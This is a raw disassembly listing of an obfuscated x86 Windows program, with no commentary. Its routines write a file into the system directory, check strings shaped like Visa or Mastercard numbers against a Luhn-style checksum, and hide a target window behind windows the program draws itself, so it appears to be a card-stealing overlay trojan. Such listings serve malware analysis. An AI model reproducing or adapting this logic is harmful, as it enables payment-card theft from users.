add esp, 20h
loc_43D6A8: ; CODE XREF: sub_43D357+2A5�j
; sub_43D357+2E0�j ...
or edi, edi
jnz short loc_43D639
loc_43D6AC: ; CODE XREF: sub_43D357+298�j
; sub_43D357+311�j
pop edi
pop esi
pop ebx
leave
retn
sub_43D357 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43D6B1 proc near ; CODE XREF: sub_43EC0A+2F3�p
var_4C = dword ptr -4Ch
var_48 = byte ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = word ptr -38h
var_30 = dword ptr -30h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 4Ch
push ebx
push esi
push edi
mov eax, dword_44A23C
sub eax, 5
mov [ebp+var_4], eax
jmp short loc_43D6DD
; ---------------------------------------------------------------------------
loc_43D6C7: ; CODE XREF: sub_43D6B1+40�j
mov eax, 30h
mul [ebp+var_4]
mov [ebp+var_20], eax
and ds:dword_447370[eax], 0
inc [ebp+var_4]
loc_43D6DD: ; CODE XREF: sub_43D6B1+14�j
movsx eax, word_44A264
mov edx, dword_44A0A0
lea eax, [eax+edx+57h]
cmp [ebp+var_4], eax
jb short loc_43D6C7
push 0
call ds:dword_4460D0
push offset dword_44A394
push offset dword_44BAB8
push 7
push 0
push offset dword_44B9F8
call ds:dword_446624
mov ebx, eax
mov eax, dword_44A11C
sub eax, 5
cmp ebx, eax
jnz loc_43D8D9
lea eax, [ebp+var_C]
push eax
mov eax, dword_44A394
push eax
mov edi, [eax]
call dword ptr [edi+1Ch]
mov ebx, eax
mov eax, dword_44A190
sub eax, 2
cmp ebx, eax
jnz short loc_43D759
mov eax, dword_44A10C
movsx edx, word_44A208
add eax, edx
sub eax, 0Bh
cmp [ebp+var_C], eax
jnz short loc_43D75E
loc_43D759: ; CODE XREF: sub_43D6B1+90�j
jmp loc_43D869
; ---------------------------------------------------------------------------
loc_43D75E: ; CODE XREF: sub_43D6B1+A6�j
mov eax, dword_44A1D4
movsx edx, word_44A130
add eax, edx
sub eax, 5
mov [ebp+var_8], eax
jmp loc_43D85D
; ---------------------------------------------------------------------------
loc_43D777: ; CODE XREF: sub_43D6B1+1B2�j
mov [ebp+var_38], 3
mov eax, [ebp+var_8]
mov [ebp+var_30], eax
lea eax, [ebp+var_3C]
push eax
lea esi, [ebp+var_38]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, dword_44A394
push edi
mov edi, [edi]
call dword ptr [edi+20h]
mov ebx, eax
movsx eax, word_44A144
add eax, dword_44A0A0
sub eax, 0Ah
cmp ebx, eax
jnz loc_43D85A
lea eax, [ebp+var_40]
push eax
push offset dword_44BAD8
mov eax, [ebp+var_3C]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
mov eax, dword_44A1D0
movsx edx, word_44A264
add eax, edx
sub eax, 10h
cmp ebx, eax
jnz short loc_43D851
lea eax, off_44A390
mov [ebp+var_24], eax
push eax
mov esi, [eax]
call dword ptr [esi+4]
lea eax, [ebp+var_44]
push eax
push offset dword_44BA18
mov eax, [ebp+var_24]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
mov eax, dword_44A110
sub eax, 5
cmp ebx, eax
jnz short loc_43D83F
lea eax, [ebp+var_48]
push eax
push offset dword_44BA18
push [ebp+var_44]
push [ebp+var_40]
call sub_43F63D
add esp, 10h
mov [ebp+var_4C], eax
mov eax, [ebp+var_44]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_43D83F: ; CODE XREF: sub_43D6B1+169�j
mov eax, [ebp+var_24]
push eax
mov esi, [eax]
call dword ptr [esi+8]
mov eax, [ebp+var_40]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_43D851: ; CODE XREF: sub_43D6B1+136�j
mov eax, [ebp+var_3C]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_43D85A: ; CODE XREF: sub_43D6B1+105�j
inc [ebp+var_8]
loc_43D85D: ; CODE XREF: sub_43D6B1+C1�j
mov eax, [ebp+var_C]
cmp [ebp+var_8], eax
jb loc_43D777
loc_43D869: ; CODE XREF: sub_43D6B1:loc_43D759�j
lea eax, off_44A3B4
mov [ebp+var_10], eax
push eax
mov esi, [eax]
call dword ptr [esi+4]
lea eax, [ebp+var_14]
push eax
push offset dword_44BA08
mov eax, [ebp+var_10]
push eax
mov esi, [eax]
call dword ptr ds:0[esi]
mov eax, [ebp+var_10]
push eax
mov esi, [eax]
call dword ptr [esi+8]
lea eax, [ebp+var_1C]
push eax
push offset dword_44BA08
push [ebp+var_14]
push dword_44A394
call sub_43F63D
add esp, 10h
mov [ebp+var_18], eax
mov ecx, dword_44A1CC
add ecx, dword_44A0EC
sub ecx, 0Ah
cmp eax, ecx
jnz short loc_43D8D9
mov eax, dword_44A394
push eax
mov esi, [eax]
call dword ptr [esi+8]
and dword_44A394, 0
loc_43D8D9: ; CODE XREF: sub_43D6B1+6F�j
; sub_43D6B1+214�j
pop edi
pop esi
pop ebx
leave
retn
sub_43D6B1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43D8DE proc near ; CODE XREF: sub_43AF47+327�p
; sub_43AF47+3B2�p
var_16C = byte ptr -16Ch
var_168 = byte ptr -168h
var_104 = byte ptr -104h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 16Ch
push ebx
push esi
push edi
push 104h
lea eax, [ebp+var_104]
push eax
call ds:dword_446600 ; GetSystemDirectoryA
lea eax, [ebp+var_168]
push eax
call sub_43F85A
push offset byte_44B09B
call sub_43C507
push eax
lea esi, [ebp+var_104]
push esi
call ds:dword_444020
lea eax, [ebp+var_168]
push eax
lea eax, [ebp+var_104]
push eax
call ds:dword_444020
push offset byte_44B093
call sub_43C507
push eax
lea esi, [ebp+var_104]
push esi
call ds:dword_444020
add esp, 24h
push 0
push 80h
push 4
push 0
movsx eax, word_44A0D0
sub eax, 7
push eax
push 40000000h
lea eax, [ebp+var_104]
push eax
call ds:dword_449788 ; CreateFileA
mov edi, eax
push 0
push 0
push [ebp+arg_4]
push edi
call ds:dword_449B9C ; SetFilePointer
mov eax, [ebp+arg_0]
mov ecx, eax
or eax, 0FFFFFFFFh
loc_43D98F: ; CODE XREF: sub_43D8DE+B6�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43D98F
mov esi, eax
push 0
lea ebx, [ebp+var_16C]
push ebx
push esi
push [ebp+arg_0]
push edi
call ds:dword_449B8C ; WriteFile
push edi
call ds:dword_448654 ; CloseHandle
pop edi
pop esi
pop ebx
leave
retn
sub_43D8DE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43D9B8 proc near ; DATA XREF: sub_439B7B+9B�o
var_21C = dword ptr -21Ch
var_218 = dword ptr -218h
var_214 = dword ptr -214h
var_210 = dword ptr -210h
var_20C = dword ptr -20Ch
var_208 = dword ptr -208h
var_204 = dword ptr -204h
var_1FE = byte ptr -1FEh
var_FF = byte ptr -0FFh
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 21Ch
push ebx
push esi
push edi
lea eax, [ebp+var_210]
push eax
push offset dword_4460F0
call sub_44047F
add esp, 8
mov [ebp+var_208], eax
test eax, eax
jnz short loc_43D9E9
xor eax, eax
jmp loc_43DB86
; ---------------------------------------------------------------------------
loc_43D9E9: ; CODE XREF: sub_43D9B8+28�j
mov eax, dword_44A0EC
add eax, dword_44A0DC
sub eax, 3
mov [ebp+var_204], eax
loc_43D9FD: ; CODE XREF: sub_43D9B8+1BA�j
mov eax, [ebp+var_204]
mov edx, [ebp+var_208]
lea ecx, [edx+eax]
or eax, 0FFFFFFFFh
loc_43DA0F: ; CODE XREF: sub_43D9B8+5C�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43DA0F
mov [ebp+var_20C], eax
cmp [ebp+var_20C], 0FFh
jnb short loc_43DA53
mov eax, [ebp+var_204]
movsx edx, word_44A230
add edx, dword_44A1E8
sub edx, 6
add eax, edx
add eax, [ebp+var_208]
push eax
lea eax, [ebp+var_FF]
push eax
call sub_442F8C
loc_43DA53: ; CODE XREF: sub_43D9B8+6E�j
mov eax, dword_44A0C8
mov esi, eax
add esi, dword_44A1D4
sub esi, 2
jmp short loc_43DA8A
; ---------------------------------------------------------------------------
loc_43DA65: ; CODE XREF: sub_43D9B8+E4�j
cmp [ebp+esi+var_FF], 28h
jnz short loc_43DA77
mov [ebp+esi+var_FF], 2Bh
loc_43DA77: ; CODE XREF: sub_43D9B8+B5�j
cmp [ebp+esi+var_FF], 29h
jnz short loc_43DA89
mov [ebp+esi+var_FF], 3Dh
loc_43DA89: ; CODE XREF: sub_43D9B8+C7�j
inc esi
loc_43DA8A: ; CODE XREF: sub_43D9B8+AB�j
lea ecx, [ebp+var_FF]
or eax, 0FFFFFFFFh
loc_43DA93: ; CODE XREF: sub_43D9B8+E0�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43DA93
cmp esi, eax
jb short loc_43DA65
push 0FFh
lea eax, [ebp+var_1FE]
push eax
lea eax, [ebp+var_FF]
push eax
call sub_438348
add esp, 0Ch
mov ebx, eax
mov eax, dword_44A158
mov edi, eax
add edi, dword_44A20C
sub edi, 0Fh
jmp short loc_43DAFB
; ---------------------------------------------------------------------------
loc_43DACD: ; CODE XREF: sub_43D9B8+145�j
movsx eax, [ebp+edi+var_1FE]
mov [ebp+var_218], eax
mov eax, edi
mul edi
mov [ebp+var_21C], eax
mov eax, [ebp+var_218]
mov edx, [ebp+var_21C]
sub eax, edx
mov [ebp+edi+var_1FE], al
inc edi
loc_43DAFB: ; CODE XREF: sub_43D9B8+113�j
cmp edi, ebx
jb short loc_43DACD
mov eax, dword_44A110
add eax, dword_44A094
sub eax, 0Ah
push eax
push [ebp+arg_0]
lea eax, [ebp+var_1FE]
push eax
call sub_4384B5
add esp, 0Ch
mov [ebp+var_214], eax
mov eax, dword_44A140
add eax, 0FFF6h
cmp [ebp+var_214], eax
jz short loc_43DB49
push [ebp+var_208]
call ds:dword_44661C ; LocalFree
xor eax, eax
inc eax
jmp short loc_43DB86
; ---------------------------------------------------------------------------
loc_43DB49: ; CODE XREF: sub_43D9B8+17E�j
mov eax, [ebp+var_20C]
mov edx, dword_44A274
add edx, dword_44A0A8
sub edx, 2
add eax, edx
add [ebp+var_204], eax
mov eax, [ebp+var_210]
cmp [ebp+var_204], eax
jb loc_43D9FD
push [ebp+var_208]
call ds:dword_44661C ; LocalFree
xor eax, eax
loc_43DB86: ; CODE XREF: sub_43D9B8+2C�j
; sub_43D9B8+18F�j
pop edi
pop esi
pop ebx
leave
retn
sub_43D9B8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43DB8B proc near ; CODE XREF: sub_43858C+BA9�p
var_324 = dword ptr -324h
var_320 = dword ptr -320h
var_31C = dword ptr -31Ch
var_318 = dword ptr -318h
var_314 = dword ptr -314h
var_310 = dword ptr -310h
var_30C = dword ptr -30Ch
var_308 = dword ptr -308h
var_304 = dword ptr -304h
var_300 = dword ptr -300h
var_2FC = dword ptr -2FCh
var_2F8 = dword ptr -2F8h
var_2F4 = dword ptr -2F4h
var_2F0 = dword ptr -2F0h
var_2EC = dword ptr -2ECh
var_2E8 = dword ptr -2E8h
var_2E4 = dword ptr -2E4h
var_2E0 = dword ptr -2E0h
var_2DC = dword ptr -2DCh
var_2D8 = dword ptr -2D8h
var_2D4 = dword ptr -2D4h
var_2D0 = dword ptr -2D0h
var_2CC = dword ptr -2CCh
var_2C6 = byte ptr -2C6h
var_2C4 = dword ptr -2C4h
var_2C0 = dword ptr -2C0h
var_2BC = dword ptr -2BCh
var_2B8 = dword ptr -2B8h
var_2B4 = dword ptr -2B4h
var_2B0 = dword ptr -2B0h
var_2AC = dword ptr -2ACh
var_2A8 = dword ptr -2A8h
var_2A4 = dword ptr -2A4h
var_2A0 = dword ptr -2A0h
var_29C = dword ptr -29Ch
var_298 = dword ptr -298h
var_294 = dword ptr -294h
var_290 = dword ptr -290h
var_28C = dword ptr -28Ch
var_288 = dword ptr -288h
var_284 = dword ptr -284h
var_280 = dword ptr -280h
var_27C = dword ptr -27Ch
var_278 = dword ptr -278h
var_274 = dword ptr -274h
var_270 = dword ptr -270h
var_26C = dword ptr -26Ch
var_268 = dword ptr -268h
var_264 = dword ptr -264h
var_260 = dword ptr -260h
var_25C = dword ptr -25Ch
var_258 = dword ptr -258h
var_253 = byte ptr -253h
var_23F = byte ptr -23Fh
var_140 = dword ptr -140h
var_13C = dword ptr -13Ch
var_138 = dword ptr -138h
var_134 = dword ptr -134h
var_130 = dword ptr -130h
var_12C = dword ptr -12Ch
var_128 = dword ptr -128h
var_124 = dword ptr -124h
var_120 = dword ptr -120h
var_11C = dword ptr -11Ch
var_118 = dword ptr -118h
var_114 = dword ptr -114h
var_110 = dword ptr -110h
var_10C = dword ptr -10Ch
var_108 = byte ptr -108h
var_106 = byte ptr -106h
var_105 = byte ptr -105h
var_104 = byte ptr -104h
var_102 = word ptr -102h
var_100 = byte ptr -100h
var_FF = byte ptr -0FFh
var_FE = byte ptr -0FEh
var_F5 = byte ptr -0F5h
var_F4 = byte ptr -0F4h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 324h
push ebx
push esi
push edi
cmp [ebp+arg_4], 0
jz loc_43EBBA
mov eax, [ebp+arg_0]
mov al, [eax]
cmp al, 34h
jz short loc_43DBB2
cmp al, 35h
jnz loc_43EBBA
loc_43DBB2: ; CODE XREF: sub_43DB8B+1D�j
mov eax, [ebp+arg_0]
mov ecx, eax
or eax, 0FFFFFFFFh
loc_43DBBA: ; CODE XREF: sub_43DB8B+34�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43DBBA
mov [ebp+var_128], eax
mov edx, dword_44A1AC
add edx, 0Bh
cmp eax, edx
jz short loc_43DBE6
movsx edx, word_44A118
add edx, 10h
cmp eax, edx
jnz loc_43EBBA
loc_43DBE6: ; CODE XREF: sub_43DB8B+47�j
mov ebx, dword_44A254
sub ebx, 9
jmp short loc_43DC15
; ---------------------------------------------------------------------------
loc_43DBF1: ; CODE XREF: sub_43DB8B+94�j
mov eax, 30h
mul ebx
mov [ebp+var_260], eax
mov eax, [ebp+arg_4]
mov edx, [ebp+var_260]
cmp ds:dword_447370[edx], eax
jz loc_43EBBA
inc ebx
loc_43DC15: ; CODE XREF: sub_43DB8B+64�j
mov eax, dword_44A138
add eax, 64h
cmp ebx, eax
jb short loc_43DBF1
mov eax, dword_44A234
add eax, 0Fh
cmp [ebp+var_128], eax
jnz loc_43DE00
mov eax, [ebp+arg_0]
mov al, [eax+4]
cmp al, 2Dh
jz short loc_43DC47
cmp al, 20h
jnz loc_43EBBA
loc_43DC47: ; CODE XREF: sub_43DB8B+B2�j
mov eax, [ebp+arg_0]
mov al, [eax+9]
cmp al, 2Dh
jz short loc_43DC59
cmp al, 20h
jnz loc_43EBBA
loc_43DC59: ; CODE XREF: sub_43DB8B+C4�j
mov eax, [ebp+arg_0]
mov al, [eax+0Eh]
cmp al, 2Dh
jz short loc_43DC6B
cmp al, 20h
jnz loc_43EBBA
loc_43DC6B: ; CODE XREF: sub_43DB8B+D6�j
mov eax, dword_44A1AC
mov edx, [ebp+arg_0]
mov dl, [edx]
mov [ebp+eax+var_104], dl
mov eax, dword_44A270
mov edx, [ebp+arg_0]
mov dl, [edx+1]
mov byte ptr [ebp+eax+var_102], dl
mov eax, dword_44A1D4
mov edx, [ebp+arg_0]
mov dl, [edx+2]
mov [ebp+eax+var_FF], dl
movsx eax, word_44A100
movsx edx, word_44A174
add eax, edx
mov edx, [ebp+arg_0]
mov dl, [edx+3]
mov [ebp+eax+var_106], dl
mov eax, dword_44A220
mov edx, [ebp+arg_0]
mov dl, [edx+5]
mov [ebp+eax+var_FF], dl
mov eax, dword_44A10C
add eax, dword_44A248
mov edx, [ebp+arg_0]
mov dl, [edx+6]
mov [ebp+eax+var_100], dl
movsx eax, word_44A208
mov edx, [ebp+arg_0]
mov dl, [edx+7]
mov [ebp+eax+var_FE], dl
mov eax, dword_44A0F8
movsx edx, word_44A230
add eax, edx
mov edx, [ebp+arg_0]
mov dl, [edx+8]
mov [ebp+eax+var_105], dl
mov eax, dword_44A15C
mov edx, [ebp+arg_0]
mov dl, [edx+0Ah]
mov [ebp+eax+var_100], dl
movsx eax, word_44A0A4
mov edx, dword_44A0AC
lea eax, [eax+edx+2]
mov edx, [ebp+arg_0]
mov dl, [edx+0Bh]
mov [ebp+eax+var_FF], dl
mov eax, dword_44A154
inc eax
add eax, dword_44A1A8
mov edx, [ebp+arg_0]
mov dl, [edx+0Ch]
mov [ebp+eax+var_FF], dl
movsx eax, word_44A24C
mov edx, dword_44A18C
lea eax, [eax+edx+2]
mov edx, [ebp+arg_0]
mov dl, [edx+0Dh]
mov [ebp+eax+var_FF], dl
mov eax, dword_44A0DC
add eax, 6
movsx edx, word_44A1F0
add eax, edx
mov edx, [ebp+arg_0]
mov dl, [edx+0Fh]
mov [ebp+eax+var_FF], dl
movsx eax, word_44A260
mov edx, [ebp+arg_0]
mov dl, [edx+10h]
mov [ebp+eax+var_F4], dl
movsx eax, word_44A230
movsx edx, word_44A16C
lea eax, [eax+edx+7]
mov edx, [ebp+arg_0]
mov dl, [edx+11h]
mov [ebp+eax+var_FF], dl
mov eax, dword_44A094
add eax, 4
add eax, dword_44A17C
mov edx, [ebp+arg_0]
mov dl, [edx+12h]
mov [ebp+eax+var_FF], dl
mov eax, dword_44A19C
mov edx, dword_44A0D4
sub edx, 6
mov [ebp+eax+var_F5], dl
jmp short loc_43DE0F
; ---------------------------------------------------------------------------
loc_43DE00: ; CODE XREF: sub_43DB8B+A4�j
push [ebp+arg_0]
lea eax, [ebp+var_FF]
push eax
call sub_442F8C
loc_43DE0F: ; CODE XREF: sub_43DB8B+273�j
mov eax, dword_44A158
mov esi, eax
add esi, dword_44A25C
sub esi, 11h
jmp short loc_43DE36
; ---------------------------------------------------------------------------
loc_43DE21: ; CODE XREF: sub_43DB8B+2B9�j
mov al, [ebp+esi+var_FF]
cmp al, 30h
jl short loc_43DE30
cmp al, 39h
jle short loc_43DE35
loc_43DE30: ; CODE XREF: sub_43DB8B+29F�j
jmp loc_43EBBA
; ---------------------------------------------------------------------------
loc_43DE35: ; CODE XREF: sub_43DB8B+2A3�j
inc esi
loc_43DE36: ; CODE XREF: sub_43DB8B+294�j
mov eax, dword_44A20C
inc eax
add eax, dword_44A214
cmp esi, eax
jb short loc_43DE21
mov eax, dword_44A210
add eax, dword_44A1A8
sub eax, 3
mov [ebp-108h], eax
mov eax, dword_44A1AC
movsx edx, word_44A180
mov esi, eax
add esi, edx
sub esi, 9
jmp short loc_43DEBA
; ---------------------------------------------------------------------------
loc_43DE6F: ; CODE XREF: sub_43DB8B+339�j
movsx eax, [ebp+esi+var_FF]
sub eax, 30h
movsx edx, word_44A100
movsx ecx, word_44A104
add edx, ecx
sub edx, 9
imul eax, edx
add [ebp-108h], eax
cmp [ebp+esi+var_FF], 34h
jle short loc_43DEB0
movsx eax, word_44A250
add eax, 8
sub [ebp-108h], eax
loc_43DEB0: ; CODE XREF: sub_43DB8B+313�j
mov eax, dword_44A1B8
sub eax, 3
add esi, eax
loc_43DEBA: ; CODE XREF: sub_43DB8B+2E2�j
mov eax, dword_44A268
add eax, 0Ch
cmp esi, eax
jb short loc_43DE6F
mov eax, dword_44A120
mov ebx, eax
add ebx, dword_44A15C
sub ebx, 0Dh
jmp short loc_43DEF6
; ---------------------------------------------------------------------------
loc_43DED8: ; CODE XREF: sub_43DB8B+375�j
movsx eax, [ebp+ebx+var_FF]
sub eax, 30h
add [ebp-108h], eax
mov eax, dword_44A190
add eax, dword_44A18C
add ebx, eax
loc_43DEF6: ; CODE XREF: sub_43DB8B+34B�j
mov eax, dword_44A094
add eax, 0Ah
cmp ebx, eax
jb short loc_43DED8
mov eax, [ebp-108h]
mov ecx, 0Ah
xor edx, edx
div ecx
movsx edi, word_44A1A4
add edi, dword_44A11C
sub edi, 0Ch
cmp edx, edi
jnz loc_43EBBA
lea eax, [ebp+var_FF]
push eax
call ds:dword_449774
pop ecx
or eax, eax
jnz loc_43EBBA
mov esi, dword_44A1F8
sub esi, 3
mov eax, dword_44A1D0
mov esi, eax
add esi, dword_44A284
sub esi, 10h
jmp short loc_43DF72
; ---------------------------------------------------------------------------
loc_43DF5A: ; CODE XREF: sub_43DB8B+3F7�j
mov eax, 30h
mul esi
mov [ebp+var_264], eax
cmp ds:dword_447370[eax], 0
jz short loc_43DF84
inc esi
loc_43DF72: ; CODE XREF: sub_43DB8B+3CD�j
mov eax, dword_44A220
add eax, 5Eh
add eax, dword_44A1D4
cmp esi, eax
jb short loc_43DF5A
loc_43DF84: ; CODE XREF: sub_43DB8B+3E4�j
mov eax, dword_44A0AC
add eax, 63h
cmp esi, eax
jz loc_43EBBA
mov eax, 30h
mul esi
mov [ebp+var_268], eax
mov eax, [ebp+arg_4]
mov edx, [ebp+var_268]
mov ds:dword_447370[edx], eax
push offset byte_44B081
call sub_43C507
pop ecx
push 0
push eax
push 0
push [ebp+arg_4]
call ds:dword_44963C ; FindWindowExA
mov [ebp+var_134], eax
test eax, eax
jnz short loc_43DFDD
mov eax, [ebp+arg_4]
mov [ebp+var_134], eax
loc_43DFDD: ; CODE XREF: sub_43DB8B+447�j
push offset asc_44B074 ; "\t"
call sub_43C507
push eax
push [ebp+var_134]
call sub_43F6E3
mov [ebp+var_12C], eax
push offset asc_44B068 ; "\b"
call sub_43C507
push eax
push [ebp+var_12C]
call sub_43F6E3
mov edi, eax
mov eax, 30h
mul esi
mov [ebp+var_26C], eax
mov ebx, eax
mov ds:dword_447374[ebx], edi
push 0
mov eax, 30h
mul esi
mov [ebp+var_270], eax
push ds:dword_447374[eax]
call ds:dword_44965C ; ShowWindow
lea eax, [ebp+var_11C]
push eax
push [ebp+var_12C]
call ds:dword_449654 ; GetWindowRect
push 0
call ds:dword_4465E8 ; GetModuleHandleA
mov [ebp+var_10C], eax
push offset word_44B05E
call sub_43C507
add esp, 1Ch
push 0
push [ebp+var_10C]
push 0
push [ebp+var_12C]
mov edi, [ebp+var_110]
sub edi, [ebp+var_118]
push edi
mov edi, [ebp+var_114]
sub edi, [ebp+var_11C]
push edi
mov edi, dword_44A1F8
sub edi, 3
push edi
movsx edi, word_44A178
sub edi, 4
push edi
push 50800000h
lea edi, [ebp+var_FF]
push edi
push eax
push 200h
call ds:dword_44864C ; CreateWindowExA
mov edi, eax
mov eax, 30h
mul esi
mov [ebp+var_274], eax
mov ebx, eax
mov ds:dword_447378[ebx], edi
mov edi, [ebp+var_110]
sub edi, [ebp+var_118]
movsx ebx, word_44A240
mov edx, dword_44A0F0
lea ebx, [ebx+edx+0F7h]
sub edi, ebx
mov ebx, dword_44A248
add ebx, 37h
add ebx, dword_44A200
mov eax, edi
sub eax, ebx
xor edx, edx
test eax, eax
setl dl
add eax, edx
sar eax, 1
mov [ebp+var_124], eax
mov eax, dword_44A0B4
movsx edx, word_44A1E0
add eax, edx
sub eax, 0Bh
cmp [ebp+var_124], eax
jge short loc_43E14D
mov eax, dword_44A128
sub eax, 8
mov [ebp+var_124], eax
loc_43E14D: ; CODE XREF: sub_43DB8B+5B2�j
mov eax, [ebp+var_114]
sub eax, [ebp+var_11C]
movsx edx, word_44A1A4
movsx ecx, word_44A180
lea edx, [edx+ecx+22h]
sub eax, edx
mov [ebp+var_120], eax
push offset dword_44B054
call sub_43C507
mov [ebp+var_278], eax
push offset byte_44B03B
call sub_43C507
mov [ebp+var_27C], eax
push 0
push [ebp+var_10C]
push 0
mov eax, 30h
mul esi
mov [ebp+var_280], eax
mov edi, eax
push ds:dword_447378[edi]
movsx edi, word_44A230
add edi, 36h
push edi
push [ebp+var_120]
push [ebp+var_124]
movsx edi, word_44A0BC
mov ebx, dword_44A1CC
lea edi, [edi+ebx+5]
push edi
push 50800000h
mov edi, [ebp+var_27C]
push edi
mov edi, [ebp+var_278]
push edi
mov edi, dword_44A1D4
add edi, dword_44A21C
sub edi, 0Ah
push edi
call ds:dword_44864C ; CreateWindowExA
mov [ebp+var_138], eax
push offset byte_44B031
call sub_43C507
mov [ebp+var_284], eax
push offset byte_44B02D
call sub_43C507
mov [ebp+var_288], eax
push 0
push [ebp+var_10C]
push 0
mov eax, 30h
mul esi
mov [ebp+var_28C], eax
mov edi, eax
push ds:dword_447378[edi]
movsx edi, word_44A24C
mov ebx, dword_44A1D0
lea edi, [edi+ebx+0EAh]
push edi
push [ebp+var_120]
mov edi, [ebp+var_124]
mov ebx, dword_44A108
add ebx, 36h
add edi, ebx
mov ebx, dword_44A0D4
movsx edx, word_44A178
add ebx, edx
sub ebx, 9
add edi, ebx
push edi
mov edi, dword_44A0EC
add edi, 10h
push edi
push 50800009h
mov edi, [ebp+var_288]
push edi
mov edi, [ebp+var_284]
push edi
mov edi, dword_44A210
dec edi
push edi
call ds:dword_44864C ; CreateWindowExA
mov [ebp+var_13C], eax
push 0
push 2
push 0
push 0
push 5
push 1
mov eax, dword_44A0B8
sub eax, 3
push eax
mov eax, dword_44A1EC
add eax, dword_44A1B8
sub eax, 0Dh
push eax
movsx eax, word_44A22C
movsx edx, word_44A1E0
add eax, edx
sub eax, 0Ah
push eax
push 2BCh
mov eax, dword_44A20C
sub eax, 6
push eax
mov eax, dword_44A0F0
dec eax
push eax
mov eax, dword_44A0E4
dec eax
push eax
mov eax, dword_44A204
add eax, 0Dh
add eax, dword_44A19C
push eax
call ds:dword_447250 ; CreateFontA
mov [ebp+var_140], eax
push 1
push eax
push 30h
push [ebp+var_138]
call ds:dword_444014 ; SendMessageA
push offset byte_44B023
call sub_43C507
mov [ebp+var_290], eax
push offset word_44B01E
call sub_43C507
add esp, 18h
push 0
push [ebp+var_10C]
push 0
push [ebp+var_13C]
movsx edi, word_44A240
add edi, 0F8h
mov ebx, dword_44A204
movsx edx, word_44A124
add ebx, edx
sub ebx, 3
sub edi, ebx
push edi
mov edi, [ebp+var_120]
mov ebx, dword_44A1CC
sub ebx, 2
sub edi, ebx
push edi
movsx edi, word_44A16C
movsx ebx, word_44A150
add edi, ebx
sub edi, 8
push edi
movsx edi, word_44A1C0
movsx ebx, word_44A0C0
add edi, ebx
sub edi, 5
push edi
push 50000000h
push eax
mov edi, [ebp+var_290]
push edi
mov edi, dword_44A0E4
add edi, dword_44A268
sub edi, 0Dh
push edi
call ds:dword_44864C ; CreateWindowExA
mov edi, eax
mov eax, 30h
mul esi
mov [ebp+var_294], eax
mov ebx, eax
mov ds:dword_44737C[ebx], edi
mov eax, dword_44A0E4
cmp [ebp+eax+var_108], 34h
jnz short loc_43E42A
push offset word_44B016
call sub_43C507
pop ecx
push eax
lea edi, [ebp+var_253]
push edi
call sub_442F8C
jmp short loc_43E442
; ---------------------------------------------------------------------------
loc_43E42A: ; CODE XREF: sub_43DB8B+883�j
push offset aM_0 ; "\nM"
call sub_43C507
pop ecx
push eax
lea edi, [ebp+var_253]
push edi
call sub_442F8C
loc_43E442: ; CODE XREF: sub_43DB8B+89D�j
push offset word_44AF96
call sub_43C507
lea edi, [ebp+var_FF]
push edi
lea edi, [ebp+var_253]
push edi
push eax
lea edi, [ebp+var_23F]
push edi
call ds:dword_449634
push offset dword_44AF8C
call sub_43C507
mov [ebp+var_298], eax
push 0
push [ebp+var_10C]
push 0
mov eax, 30h
mul esi
mov [ebp+var_29C], eax
mov edi, eax
push ds:dword_44737C[edi]
mov edi, dword_44A164
add edi, 2Ch
push edi
push [ebp+var_120]
mov edi, dword_44A1E4
add edi, 6
push edi
mov edi, dword_44A244
movsx ebx, word_44A0B0
add edi, ebx
dec edi
push edi
push 50000000h
lea edi, [ebp+var_23F]
push edi
mov edi, [ebp+var_298]
push edi
mov edi, dword_44A188
add edi, dword_44A090
sub edi, 3
push edi
call ds:dword_44864C ; CreateWindowExA
mov [ebp+var_258], eax
push 0
push 2
push 0
push 0
push 5
push 1
mov eax, dword_44A19C
sub eax, 6
push eax
mov eax, dword_44A158
sub eax, 9
push eax
movsx eax, word_44A0D0
sub eax, 7
push eax
push 190h
movsx eax, word_44A208
add eax, dword_44A120
sub eax, 0Ah
push eax
mov eax, dword_44A1AC
add eax, dword_44A23C
sub eax, 0Ah
push eax
mov eax, dword_44A1D0
add eax, dword_44A0AC
sub eax, 2
push eax
mov eax, dword_44A220
add eax, 0Ch
push eax
call ds:dword_447250 ; CreateFontA
mov [ebp+var_130], eax
push 1
push eax
push 30h
push [ebp+var_258]
call ds:dword_444014 ; SendMessageA
push offset dword_44AF80
call sub_43C507
mov [ebp+var_2A0], eax
push offset dword_44AF7C
call sub_43C507
mov [ebp+var_2A4], eax
push 0
push [ebp+var_10C]
push 0
mov eax, 30h
mul esi
mov [ebp+var_2A8], eax
mov edi, eax
push ds:dword_44737C[edi]
mov edi, dword_44A200
add edi, 11Fh
add edi, dword_44A1EC
push edi
mov edi, dword_44A1B8
add edi, 2Dh
push edi
mov edi, dword_44A0F0
add edi, 45h
movsx ebx, word_44A208
add edi, ebx
push edi
movsx edi, word_44A118
add edi, dword_44A254
sub edi, 2
push edi
push 50800003h
mov edi, [ebp+var_2A4]
push edi
mov edi, [ebp+var_2A0]
push edi
mov edi, dword_44A168
add edi, dword_44A12C
sub edi, 8
push edi
